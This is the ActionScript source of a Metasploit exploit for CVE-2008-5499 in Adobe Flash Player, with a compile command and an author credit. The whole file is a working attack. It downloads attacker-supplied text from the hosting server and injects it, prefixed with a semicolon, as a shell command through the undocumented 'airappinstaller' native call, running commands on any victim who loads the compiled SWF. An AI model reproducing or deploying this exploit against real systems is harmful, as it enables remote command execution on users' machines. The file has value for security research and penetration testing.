metasploit-framework/external/source/exploits/CVE-2008-5499/Exploit.as

48 lines
1.2 KiB
ActionScript

/*
Compile: mtasc -version 8 -swf Exploit.swf -main -header 800:600:20 Exploit.as
Author: 0a29406d9794e4f9b30b3c5d6702c708 / Unknown / metasploit
PoC: http://downloads.securityfocus.com/vulnerabilities/exploits/32896.as
*/
import flash.external.ExternalInterface;
class Exploit {
public function randname(newLength:Number):String{
var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
var alphabet:Array = a.split("");
var randomLetter:String = "";
for (var i:Number = 0; i < newLength; i++){
randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)];
}
return randomLetter;
}
public function exploit() {
var path:String = ExternalInterface.call("window.location.href.toString") + randname(6) + ".txt";
var loadVars:LoadVars = new LoadVars();
loadVars.onData = function(str:String):Void {
if (str) {
if (_global.ASnative(2201, 1)("airappinstaller")) {
_global.ASnative(2201, 2)("airappinstaller", "; " + str);
}
} else {
// FAIL
}
}
loadVars.load(path);
}
public function Exploit() {
exploit();
}
static function main() {
var ex : Exploit;
ex = new Exploit();
}
}